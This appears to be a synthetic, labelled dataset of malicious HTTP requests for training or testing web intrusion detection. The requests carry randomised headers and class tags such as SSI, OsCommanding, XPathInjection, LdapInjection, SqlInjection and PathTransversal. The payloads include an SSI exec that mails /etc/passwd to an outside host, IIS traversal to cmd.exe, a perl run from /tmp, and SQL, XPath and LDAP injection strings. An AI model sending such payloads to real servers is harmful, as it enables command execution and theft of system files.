Accept: */*
Accept-Charset: euc-kr, cp-932, windows-1257, macintosh
Accept-Encoding: deflate, compress;q=0.4
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 230.11.35.165
Cookie: jrYhtpass36MphpsystemLK=5727537
Cookie2: $Version="3"
Date: Sun, 05 Apr 09 08:44:39 UTC
ETag: "UylSwj-j1YsBiH-"
Expect: 100-continue
From: satt@ee2io.st
If-Modified-Since: Sun, 19 Feb 06 18:23:53 GMT
If-Unmodified-Since: Mon, 23 Jan 06 08:22:56 UTC
If-Match: "kiqglVPP@sCFdFE-"
If-None-Match: "5yN@qadtWaSIwcNLNoi"
If-Range: Tue, 09 Jan 07 21:00:41 GMT
Max-Forwards: 1
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic aW1vc3RkNnU6cFNldTk=
Range: 89-,6-,2-
Referer: /myh7rts/3nehsni.gif
TE: deflate,trailers
Trailer: Transfer-Encoding
User-Agent: ivda4o
UA-CPU: PowerPC
UA-Disp: 2710,0982,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 801x1629
Via: uwatc/0.4 www.le8sodo.html
Transfer-Encoding: ebnipp
Upgrade: e2idw/6.5, 2eabf/4.4, hean/1.8
Warning: 068 www.nEtms.tiff:791 "hzcetNt0o1a8aftr" "Thu, 03 Dec 09 09:45:12 UTC"
X-Forwarded-For: 228.244.125.120
X-Serial-Number: 56802452036751769
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43435
Start - Id: 40259
class: SSI
PUT /isaiasiulv/ruw.jsp? HTTP/1.0
Content-Length: 222
Content-Language: i,bd
Content-Encoding: identity
Content-Location: /vebdt/Toytea/aep4av/tore/KlShsxen.dll
Content-MD5: cjZpc2dpbDAzY2VPdGhOcg==
Content-Type: application/x-www-form-urlencoded
Host: 109.42.63.139
Connection: close
Accept: */*
Accept-Charset: *
Accept-Language: *;q=0.4
Date: Wed, 05 Apr 06 20:27:26 CET
If-Match: *
Proxy-Authorization: sdec hhs7e0o=asdogari
Authorization: NTLM R29zYWNvaWxldG9UcHJvdG5uem5oRWJ6cXliZWVld2U=
Referer: /xBti.aspx
User-Agent: Mozilla/6.0 (X11; U; Linux i386 8.5; rg-kn; rv:9.6.0) Gecko/25607201
Upgrade: ecsoa/3.5, cuh/6.5

moeTE=d ETs&io=<!--    #exec cmd="c:\progra~1\oal\9ng\z64r.exe d:\nSa\www.geitni.org\sotaweo\database.mdb /x  exporttofoxpro"-->&Iphttpslc=s:8pa&group bychomeCBz=8hmO<hhnabi&$r

End - Id: 40259
Start - Id: 43029
class: OsCommanding
PUT /ox9vtOrVo2dneoh/lBMx7biuUT-8/riaz/ethaN85/tSXnUtXXsN_/IjdiGtdit1emSqk/S3druhmoaeoalni/l2ktttc/scen/YCyrbEPFSBNW/eHb3JGrmMyb31Zn.msf? HTTP/1.0
Content-Length: 136
Content-Language: ulsat
Content-Encoding: deflate
Content-Location: /atw4le.css
Content-MD5: c2FpcHRyaUE1THI0M3Yzcw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Jan 10 10:31:06 CET
Last-Modified: Fri, 06 Jun 08 07:21:36 UTC
Host: 38.252.179.83
Connection: close
Accept: video/quicktime;q=0.9
Accept-Charset: x-mac-greek
Accept-Encoding: 
Accept-Language: nP6tLoo-yeeO;q=0.1
Cache-Control: max-stale=17781
Client-ip: 65.119.102.85
Cookie: in4r=7;eeavo=aH
Cookie2: $Version="911"
Date: Thu, 19 Mar 09 12:13:27 UTC
ETag: "AlUxBRc1lFh7_IbRVoc"
Expect: 100-continue
From: rnlsu@o9ld8G.org
If-Modified-Since: Sun, 22 Jun 08 13:50:00 GMT
If-Unmodified-Since: Wed, 14 Apr 10 15:40:43 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 12 Jan 08 10:38:17 CET
Max-Forwards: 693
Pragma: bpHyiwu=rwt
Proxy-Authorization: NTLM eGV0aXNuc29ydXBqdERwdGVpU25vMHNhbGFvYmJiemFrT2NyYWVoZWhk
Authorization: Basic c2FpVHpFOmV1cmFtbVM=
Range: -98633,070828-,-9277
Referer: http://www.yysd.cz/neulbet.avi
TE: gzip;q=0.5,deflate
Trailer: Connection
User-Agent: wEsqLbrmt (o@tT@JOzW; spSOQn7TAb; anUfnz)
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: 8.4 www.zjlnhda.shtml:7468, 0.3 www.nOkta.shtml:8, HTTP/7.1 236.207.205.219:9
Transfer-Encoding: compress
Upgrade: p2tir/9.7, ante/3.0, yetR/9.1, 99uamy/7.6
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 225.212.15.105
X-Serial-Number: 4857297063808
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

naccess_loghomePONUMY74F=58721606&gn=|     id     |&anzp-Wc=ce leM&uauwmoeoTprrW=uS7UkVpiGSf&uzindhispv=stt&RoAraqbpuhhm=69mo&it=mNj

End - Id: 43029
Start - Id: 40015
class: SSI
GET /aLKCwFYa/d5hed/cvemHrteoaCea/dtd/iXkjfPScK/wi.asp?c1r=euma2re4h30dclyc&ntao=l44GObm_g&rd=lcxJZZBXwt-&TV4SWtWTo7D=28tsaggqe&Ro_7oE=s8r%25+hobjecthr&akInjoosr=642401493&oegpiude=avtle4neh&ttjasi=%3C%21--+%23exec++++cmd%3D%22%2Fbin%2Fmail+hhshsnhlar.com++++%3C+%2Fetc%2Fpasswd%22--%3E&_ZfDwZr=5&TsN-pIf@E=sr3floP4aitQne1pe&MMXu9g7DPE=3358979&mX.OqWO5J=r%7Cn&4tpetehOp=aRscROl7E&sId6t=912&ohakoI1obitxaop=7837862 HTTP/1.0
Host: www.ndny1.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.5, identity
Accept-Language: urame-rS;q=0.7
Cache-Control: no-store
Client-ip: 133.142.247.233
Cookie: ngtdySo=ofrom;ucosyniet=0873;toe=kboot.iniunetcat&;loeae=hZoXx;homehkeJ_=b neaTpreqvgfromf
Cookie2: $Version="2"
Date: Thu, 30 Apr 09 13:58:52 GMT
ETag: W/".1jeLkNVQ5pd_jD-7"
Expect: ieg6l
From: l1ahde@nablau.fr
If-Modified-Since: Sun, 18 Apr 10 15:49:59 CET
If-Unmodified-Since: Fri, 09 Apr 10 13:59:57 UTC
If-Match: "DBi-CJQy63mNzKEzv"
If-None-Match: *
If-Range: Tue, 06 Sep 05 17:33:21 UTC
Max-Forwards: 167
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: ehoi omrlLio0=mhlctsr
Authorization: rnefn thutlu0=teulA
Range: -382094,59133-7365
Referer: /oari/lavhiih/tsltnah.sh
TE: trailers,deflate;q=0.0
Trailer: Host
User-Agent: akeleahai (nAOwFE2a)
UA-CPU: Sparc
UA-Disp: 270,463,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5394x1347
Via: 1.2 255.233.43.117, HTTP/3.1 www.tsbith4e.html, 7.7 101.97.156.116
Transfer-Encoding: identity
Upgrade: temy/8.7, Aane0/2.7, d4ta/9.2
Warning: 858 65.172.196.46 "sae0vvsyhhdctrb" 
X-Serial-Number: 18116
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40015
Start - Id: 36751
class: OsCommanding
GET /vs/3qK2R_o9RYGsBB/NY/5wiut0nyda3oar/csq3irc/htrqwebarehiT2c/diZ/eeriesRcq5mD.jpg?vsmitctniutexe=alwehdsngrd65&3estiituts8=%40&n46OSonnbrengn=%2Fperl++%2Ftmp%2Freic.pl++-p5249 HTTP/1.0
Host: www.hyamxo.net
Connection: boefk4ii
Accept: application/postscript, application/postscript;q=0.9, application/*;q=0.2
Accept-Charset: *
Accept-Encoding: identity;q=0.8, compress, compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 66.186.73.243
Cookie: yRLuuOS=eanyridm
Cookie2: $Version="34"
Date: Fri, 23 Mar 07 08:07:46 GMT
ETag: "OSxgv6GwIp@.QEtxE"
Expect: 100-continue
From: 9rrtotci@rtshul.org
If-Modified-Since: Fri, 12 Nov 04 21:54:38 CET
If-Unmodified-Since: Thu, 06 Mar 08 02:57:21 CET
If-Match: *
If-None-Match: "whlAbR@ZXAo_LZWA79"
If-Range: Fri, 16 Oct 09 16:20:04 UTC
Max-Forwards: 15
MIME-Version: 5.1
Pragma: teIm1ap='e'
Proxy-Authorization: ttsg7i nehfeHuT=4aeyn
Authorization: NTLM MGVlYW5abVpzZW90SXNuSHVtZHNPMXN5bG50aWVpT2hucjM=
Range: 50-7
Referer: /eiN8iv8/abopin3t/aaAfetct/uthatTc/irlndl.wav
TE: trailers,deflate;q=0.1
Trailer: From
User-Agent: xi2h (hmDCWaX; q3j2kY; eA5dvk; oDP53Km)
UA-CPU: x86
UA-Disp: 944,674,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 232x1783
Via: 7.3 www.cn5Afn.gif, 3.5 www.haoxekf.html, FTP/7.6 www.urltCr.css
Transfer-Encoding: identity
Upgrade: sieis/2.5, uit/6.8
Warning: 508 www.fetrah.tiff "t7sycuhIpesS" "Wed, 10 Feb 10 05:46:21 GMT"
X-Forwarded-For: 128.194.144.121
X-Serial-Number: 51873709956197
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36751
Start - Id: 48297
class: XPathInjection
GET /7IFPNRJVZ/tnetnit4e.pl?i0ahpeaelijnudr=63501&rnxeeyvehzhi=setbEn8ep&4qw69ahelyu=874972&kalsyzd=ayoqef+lshomenlib6s1sE&qeq@5P=4lrl%25 HTTP/1.0
Host: 149.74.36.67
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-hebrew;q=0.7, iso-2022-kr;q=0.2, windows-1250
Accept-Encoding: *;q=0.1
Accept-Language: ianasi/w/a/child::node()[position()=7]     or  'dbnrjsVp'    =   '
Cache-Control: B='dac'
Cookie2: $Version="35"
Date: Mon, 04 Jan 10 08:51:44 CET
Expect: 100-continue
From: q9erhj@rCea.net
If-Modified-Since: Sat, 05 Jul 08 23:20:56 CET
If-Unmodified-Since: Mon, 02 Jul 07 10:53:27 CET
If-Match: "RGZiilWlYbdxMTXCeViZ"
If-None-Match: *
If-Range: "liam7Qxj74kZx8FOgV"
Max-Forwards: 8671
MIME-Version: 6.0
Proxy-Authorization: Digest nonce
Authorization: Basic aW93b2RuOmE5aWJZbWg=
Referer: http://www.8r7n.be/dadrF/drHfGha/N4e7/rK8n0y/swshr.php3
TE: deflate;q=0.1,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Ito7ete/9.3.1.5
UA-Disp: 2950,738,32
UA-Pixels: 7350x333
Via: 6.4 81.67.164.121, 1.9 www.ileiE6.css, 5.3 www.iodlLmba.shtml
Transfer-Encoding: gzip
Upgrade: ktlatf/2.6, dtr/7.2
Warning: 917 209.120.191.237 "rpaWttoyTfGs" "Mon, 30 May 05 05:56:19 GMT"
X-Forwarded-For: 122.89.87.216
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48297
Start - Id: 35771
class: XPathInjection
GET /izCjMdvjtr19Lg/eahl/o8eWG5.d1MoLzSvc7/njQXBSP@YvVHomwu/463uj2GEZdO.nsf?ne6htlktde5i=lta%2Fhzh%2FeTfDm%2Fchild%3A%3Anode%28%29%5B++++position%28%29%3D8%5D+++++%7C+++cSp%2Fddoa%2F5%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D93%5D+or+%27Uwias%27+%3D++++%27&nsnmrhgnSeiizc=n&mo7lEyOsqot3pry=615&soo=c3&Jsosyozewntries=8835900&rscriptX76=6tszyheL4pS1nime&bodyA_okjOE4X=htrcubtzttb%24g&geNrm9eqtsia0qt=mLufabae&locationvyacceptLZt=ebL5aq&atooanf0s=2&peYaow=Stbm&slaithnouoeIvrE=+iiEiioTqpst&5oyhtfttoern=v8%26ex8tg%40tT+&soEwe=aat&hrocsl=ttndz0se1Ty2acl HTTP/1.0
Host: www.wsyexmf.org:80
Connection: 1edcaw
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: iae='iHih'
Client-ip: 92.208.144.125
Cookie: de7s=asot;2oh8txpeotee=5nmsMrqu;nsoidooneic4hh=rheealsaSfnih5e
Cookie2: $Version="07"
Date: Wed, 20 Oct 04 24:02:19 UTC
ETag: W/"sDKuASrOdbuBMPpSmEw"
Expect: m6s0=a0hOmEad
From: Nginnon@eatp.net
If-Modified-Since: Mon, 21 Aug 06 16:47:35 GMT
If-Unmodified-Since: Sun, 14 Mar 04 09:51:00 UTC
If-Match: "n084PCi1_0wB.v-s"
If-None-Match: "e1mIVbAplscG3RX@UO0"
If-Range: Thu, 03 Sep 09 24:55:21 CET
Max-Forwards: 92
MIME-Version: 7.7
Pragma: raoed=snriSr1
Proxy-Authorization: Basic cnhhZWk6b29zVlN2
Authorization: NTLM bnNhdHRzZTFjZXhkbmVlbHRlZ2dsaXA4TWQzNmVobWdzYW5pbmFhZWlubmU=
Range: 9042-41
Referer: /1Wxwigi1/5ehsIi/Ettnea/fwLh.shtml
TE: trailers,gzip
Trailer: If-None-Match
User-Agent: jRnxz/7.1
UA-CPU: x86
UA-Disp: 7633,886,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 6100x360
Via: tp9Iho/0.7 www.fecej3he.htm, HTTP/9.7 199.187.70.96, 8.0 53.112.8.163:36
Transfer-Encoding: gzip
Upgrade: homom/1.1, t6u/8.5, 6mrrds/0.2, yassta/4.9
Warning: 740 216.155.89.107:131 "6yr34ie5" 
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 040193563593
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35771
Start - Id: 35774
class: XPathInjection
GET /jK7.DUXi@Kzu.swf?Fpaeol=py%27+++or+++1%3C+++++sutnle%2Fop%2Fihir%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D9%5D++or+++%27Hdtaeat%27++%3D++%27 HTTP/1.0
Host: 24.153.59.240:80
Connection: keep-alive
Accept: video/mpeg;q=0.6, application/*, text/*;q=0.2
Accept-Charset: *
Accept-Encoding: gzip, deflate, identity;q=0.4
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 176.101.31.44
Cookie: ss2=3;dsnitrqtnyrv=gts;2l9aRldnetiguo=dci;teascee=eadRoAraidinput
Cookie2: $Version="11"
Date: Tue, 16 Jan 07 04:20:07 UTC
ETag: W/"sDKuASrOdbuBMPpSmEw"
Expect: ttoH9Am=sbdt;Ilpzdte=rufew
From: Nginnon@eatp.net
If-Modified-Since: Mon, 21 Aug 06 16:47:35 GMT
If-Unmodified-Since: Sun, 14 Mar 04 09:51:00 UTC
If-Match: "n084PCi1_0wB.v-s"
If-None-Match: "W967H0WlXF6AdvCHLvS2"
If-Range: Thu, 03 Sep 09 24:55:21 CET
Max-Forwards: 5
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic Z3Nwcjp5bVNvZWJqQQ==
Authorization: Basic cXo0ZXM2czo3dGVocw==
Range: 9042-41
Referer: http://utDen.org/ql2ee.jpg
TE: chunked,gzip,trailers
Trailer: If-None-Match
User-Agent: o1rlAhzh6kdio
UA-CPU: x86
UA-Disp: 7633,886,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 6100x360
Via: gthae/6.9 www.ht4el1.tiff, 7.1 16.141.132.144
Transfer-Encoding: jnee
Upgrade: homom/1.1, t6u/8.5, 6mrrds/0.2, yassta/4.9
Warning: 192 108.52.172.141:8 "C24i" 
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 040193563593
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35774
Start - Id: 37950
class: LdapInjection
GET /eembznyndHanTey.jpeg?Ethw9=42810280&ifi=N4a&ci2huEeYd=bseiem&d9dltk=aRK3_Qo7&e8xnetcatJ4=c-vQCX&fa4hOztmqrM=%29++++%28+%7C++%28++++cn%3D*o++++%27brien*++%29%28mail%3D*o%27brien*+++%29++++ HTTP/1.1
Host: www.o7DitR.gov
Connection: close
Accept: application/*
Accept-Charset: *;q=0.7
Accept-Encoding: *;q=0.6
Accept-Language: eKNelnh-saad, 4-rMrs
Cache-Control: no-store
Client-ip: 114.98.193.54
Cookie: sexaxC7bt=dA Tc;hOetqew=174164
Cookie2: $Version="2"
Date: Sun, 08 Jan 06 22:18:55 CET
ETag: "OGfjiId4vLFj8EUFd1BJ"
Expect: 100-continue
From: p2udarel@zentnnsmu.org
If-Modified-Since: Fri, 01 Apr 05 17:43:18 UTC
If-Unmodified-Since: Tue, 30 Dec 08 20:19:26 UTC
If-Match: *
If-None-Match: *
If-Range: "Rac18572haXkQj6nt-hB"
Max-Forwards: 824
MIME-Version: 0.6
Pragma: eptnNn=r
Proxy-Authorization: Digest username="toobo"
Authorization: Digest uri=/jrs8/tehhzt/heNhe.bin
Range: 648492-,076146-138301,-5163
Referer: /rnieDo/tdhtu.mp3
TE: chunked,deflate,gzip;q=0.2
Trailer: If-Range
User-Agent: Mozilla/1.1 (Machintosh; U; PPC 4.3; s7-en; rv:0.7.8) Gecko/74106853
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8848x2681
Via: 4.9 125.58.4.176, gfto8/9.7 118.243.94.23
Transfer-Encoding: deflate
Upgrade: spoM3/2.4, sus/6.4, cez/4.2
Warning: 209 www.aRtos.png "mgfiafudiih" 
X-Forwarded-For: 82.192.128.217
X-Serial-Number: 8812591
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37950
Start - Id: 37663
class: LdapInjection
POST /eis6A9sfUunzamztu/JS5/fTf1oIL8lSoyh/uwWOi.tiff? HTTP/1.0
Content-Length: 340
Content-Language: tsst4p,to8tV,Mhalsmr7
Content-Encoding: compress
Content-Location: http://www.nostdt.net/agsi/imbn/yhhtl/earnetaD.asmx
Content-MD5: ZXRldG1zamQxT2JocWVsdA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 31 Mar 04 06:33:46 GMT
Last-Modified: Sun, 21 Oct 07 21:18:47 GMT
Host: www.fderlehn.gov
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-ce
Accept-Encoding: 
Accept-Language: Pte-iso7e;q=0.0, a-or;q=0.2, toan-d;q=0.7
Cache-Control: no-transform
Client-ip: 88.224.210.21
Cookie: lF3cget=7190;9g1GcDQLR=ae;pyaqilhrte8ln=2128070;dlbee=is9teqiCsn=o-samprh;y5eito=bo4aSqs1;iphl8eilrs=7972
Cookie2: $Version="657"
Date: Tue, 23 Mar 04 23:13:34 CET
ETag: "L1wKH0qc0h5OgNanY"
Expect: raso5lm
From: TttDoe@rczep.it
If-Modified-Since: Fri, 12 Sep 08 16:38:18 GMT
If-Unmodified-Since: Tue, 06 Apr 04 07:27:56 GMT
If-Match: "5qVSlFtCPr@W6bgJit"
If-None-Match: *
If-Range: "paNBkSmgHm9n6DFiy"
Max-Forwards: 7858
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest uri=/heen1roq/eredadu/eloyue/dceeE.cgi
Authorization: Digest qop=elac
Range: 7-75,773-,28-851
Referer: http://www.lni0g.uk/terym.cfm
TE: deflate;q=0.0
Trailer: Authorization
User-Agent: Mozilla/3.7 (Machintosh; U; PPC 1.1; oa-sa; rv:1.2.9) Gecko/17552635
UA-CPU: StrongARM
UA-Disp: 770,856,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 940x1719
Via: 1.2 www.sgqnnra.js
Transfer-Encoding: gzip
Upgrade: pemoEi/4.0
Warning: 026 155.240.111.33 "facqeennibgrcecdveu" "Wed, 19 Jul 06 04:22:04 GMT"
X-Forwarded-For: 62.169.63.215
X-Serial-Number: 0737126851
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

inCoegs9hey1et=awZeEpGd8&xn0tsx=aTxDfBt6uklS&gueaaokmamseay=0357&rpOesa29nf=lJ~a&ocoti=sF-YAG&troozfhihy=3595578&dnms6qo0ui4rte=ida&teMiXTtoah=u@J0JtNpqv&aawnrnasawqaao=t8YdikOccM&e4rIu3=e is&ssb6senapm9hbhb=eesew)(&(objectClass= mi*)&nrs=retjyarg)iYmrh1&uYcbinGQFservices=pAddwq>o2e2Ed@&YUT3rhJwindow.openg=7385250235

End - Id: 37663
Start - Id: 44403
class: OsCommanding
GET /PBServer/..��../..��../..��../winnt/system32/cmd.exe?/c+dir+c:0 HTTP/1.1
Host: www.oTAetinth.be
Connection: eTustt
Accept: image/jpeg, image/*;q=0.4, audio/*
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.0
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 136.18.89.145
Cookie: shjevaSH=nph-eTEe;noaqfw4ro=dzPciawn7nhncaottr
Cookie2: $Version="556"
Date: Sat, 29 Apr 06 06:48:19 GMT
ETag: W/"JeOMB8IEzQqMZ5UXUF"
Expect: r1irf=e82e8ds;ueIe
From: entlr@ASnuouyuhe.cz
If-Modified-Since: Tue, 20 Jan 04 21:03:03 CET
If-Unmodified-Since: Mon, 28 Sep 09 22:27:24 CET
If-Match: "S380h@AwL-rl1Y_x4"
If-None-Match: "ByrT.aijP_C5xvp67"
If-Range: Tue, 27 Apr 10 03:38:21 CET
Max-Forwards: 1766
MIME-Version: 6.5
Pragma: eEl=bs
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: Digest realm
Range: 07334-,0929-,-17620
Referer: http://www.emmylat.be/I47c/fne1/3Ewie/eahyer.jpeg
TE: trailers,deflate,gzip
Trailer: Warning
User-Agent: Mozilla/1.0 (Windows; U; Windows NT 9.4; 76-m9; rv:5.0.0) Gecko/05121554
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6396x837
Via: 5.2 221.83.191.6, 7.2 www.tg9eetbf.css, 0.1 www.onts.jpg
Transfer-Encoding: identity
Upgrade: asneah/1.8, akhg/1.6
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 223.134.122.135
X-Serial-Number: 16212196997401300
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44403
Start - Id: 42593
class: SqlInjection
GET /processing-instructionttO/eIYNn0uZ0fU/anucuxTH6/den2KiftinNl.asp?ed4at19eeDzt=thttps&hehbutheg=OR+++%27e26ia%27+++%3D+++%27Sim%27%2B%27ple%27&e2cNIHh=545926&ah=v2nik&uu7e=aW5boO.MI2F&hh0pOwiasrac=139&N.I7YL=360684&A5ct=75&Tamipmg=n+%26%28rmtOnodlike7t&vief=in&e7Acelmes=oybura HTTP/1.0
Host: 145.58.24.146:19587
Connection: vHai
Accept: image/*, video/*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 2.110.69.195
Cookie: wealet=798;QmW99QKw82o=n35RQqZQ;sg=nbE3w8lmP-W;llede=959531
Cookie2: $Version="8"
Date: Mon, 31 Dec 07 23:31:53 GMT
ETag: "htxw_uK4_0z1HSarAA"
Expect: siHyt5
From: cnaraI@oSkg.fr
If-Modified-Since: Sun, 09 Jan 05 10:20:21 UTC
If-Unmodified-Since: Mon, 20 Nov 06 22:50:38 CET
If-Match: "U.eTCu-t1pQUGgMn"
If-None-Match: *
If-Range: ".i0RC-BNWzZKkalv"
Max-Forwards: 161
MIME-Version: 2.1
Pragma: aui5=ulh9usOu
Proxy-Authorization: Basic YXJ0MTpkaVNiYW4=
Authorization: Basic ZWF0aTplbDlybXQ=
Range: 5-,-2176,0697-71705
Referer: http://www.caI4ei.cz/r7Eat/Mitsrn/atnetthD/sq5tpd0e.mspx
TE: trailers,chunked;q=0.9,trailers
Trailer: User-Agent
User-Agent: inteou (esJppk)
UA-CPU: MIPS
UA-Disp: 8242,0192,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4922x3138
Via: FTP/0.5 117.119.91.234, coD/1.9 www.taae.js, Gex/7.5 97.23.0.126
Transfer-Encoding: deflate
Upgrade: r8az/4.5, ShnfKa/1.6, Ne8h/2.3, uo3m/9.4, baps/3.8
Warning: 765 www.ningpa.jpg "haujs3gtxtukti7rmtti" "Wed, 08 Aug 07 04:54:20 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 89713741
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42593
Start - Id: 38466
class: LdapInjection
GET /isO_IvnZVJyuDoIy.GMD/-tmp4Ly-VmuYO/tjHczTDgIe5BOjLSdivd/TJ1ca9/U5seebidoanxMHevyca/oG/hulocationYGRvK/olR0zeNNBT5d4jRjr/tiNufvDuUCFL5F/rCw1iUOwDc_EtfD6.tiff?tsfiue=rxmgsnvc&wr96big5v=8&eiertosataatr=hbriltf4nsxquxr&DADQy6yVpcS=p%2Bd9+km+%28locationk%29&ttfnhe0=wA+&pIszhraarNewe9=oN4Rdbde4zxon&0EgMUn=bfDNmNAyp&ettpTis=%3Dp0Et&oaddhTtsohwa=en&Saioneseadn=es&osTlenEn1ge=%29%28%7C+%28++++cn%3D*o+++%27brien*++++%29%28mail++%3D*o%27brien*+++%29 HTTP/1.0
Host: 40.230.182.127:80
Connection: fis97iti
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: hp4s-h;q=0.5, ehix5m-h;q=0.5, oreeohst-tgl3m;q=0.8
Cache-Control: only-if-cached
Client-ip: 180.75.19.86
Cookie: hmhoeaznnwgso=5429;osAtggxhshee2t=onmjfarumxudo;Etqe=9;ifxt=re;my=19021;pbaeeeuwEeBotl=r7A6aAtzgGM
Cookie2: $Version="554"
Date: Fri, 01 Aug 08 05:03:19 UTC
ETag: "dAKakF.oYxCdLRoI.Z"
Expect: betmtr=nyjiso;hCgrf6g
From: odvt@tmdyhis.org
If-Modified-Since: Thu, 23 Dec 04 04:53:18 GMT
If-Unmodified-Since: Thu, 16 Jun 05 07:24:08 CET
If-Match: *
If-None-Match: "QxpqdLL7zpP411paH"
If-Range: Tue, 26 Sep 06 13:37:33 UTC
Max-Forwards: 5578
MIME-Version: 5.0
Pragma: no-cache
Proxy-Authorization: iiEb vcnyig9=nalmt
Authorization: hoec no8en=Rmneert
Range: 24-,76759-,-19589
Referer: /dcforSm.avi
TE: trailers,trailers,trailers
Trailer: If-Match
User-Agent: zpetihnt (e2R@jt)
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 632x125
Via: 5.0 www.eilhyt.js:22, 9.7 202.26.190.36
Transfer-Encoding: compress
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 346 www.tt8o.css "ptUwt" "Mon, 17 Mar 08 22:41:42 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38466
Start - Id: 36176
class: PathTransversal
GET /m73dly53i/jLf/roeb4b_vJpEde9kRp1/xOLcopy/lTtNiebetotxsy/XH.msf?edea=%5CWINNT%5Csystem.ini HTTP/1.0
Host: www.ustmh1hy.com:80
Connection: efeseor
Accept-Charset: koi8-r, iso-8859-9, iso-8859-7, hz-gb-2312
Accept-Encoding: gzip;q=0.6, identity;q=0.1, compress;q=0.9, identity
Accept-Language: s-rlethetf, cnefut0-eewnans, Ra5t-u6, taem-lhhoww2a;q=0.9
Cache-Control: max-stale
Cookie2: $Version="250"
Date: Fri, 28 Aug 09 04:57:58 UTC
If-Match: "461lVokZfnuljUdsRpv"
If-Range: "YgyLXsY3Rx4H6Fr@x"
Referer: http://www.lset3eo.st/tyrDe/ktedsei/Halutiri/rteEgztd/0edOau.txt
User-Agent: Mozilla/3.7 (Machintosh; U; Mac OS X 2.6; ut-ie; rv:0.0.6) Gecko/21572902
Via: tt9he/7.2 25.200.187.170, HTTP/9.7 13.73.226.230:5436
Transfer-Encoding: identity
Upgrade: yio/9.6, huzje/3.6, uaeeO/6.2

null

End - Id: 36176
Start - Id: 44107
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.0
Host: 118.74.182.217:80
Connection: uashw1ty
Accept: */*;q=0.0
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-transform
Client-ip: 212.7.68.146
Cookie: upr9nlhjo=101;s6=eCa%
Cookie2: $Version="81"
Date: Tue, 03 Feb 09 03:10:05 GMT
ETag: "6ppIn19@NaQSoJPiB"
Expect: 100-continue
From: nvabn6ks@5obcxtres.uk
If-Modified-Since: Thu, 18 May 06 16:15:29 GMT
If-Unmodified-Since: Thu, 27 Jan 05 01:37:53 UTC
If-Match: "Uv1ZNf812leJATaD"
If-None-Match: *
If-Range: Tue, 15 Apr 08 05:32:13 UTC
Max-Forwards: 6
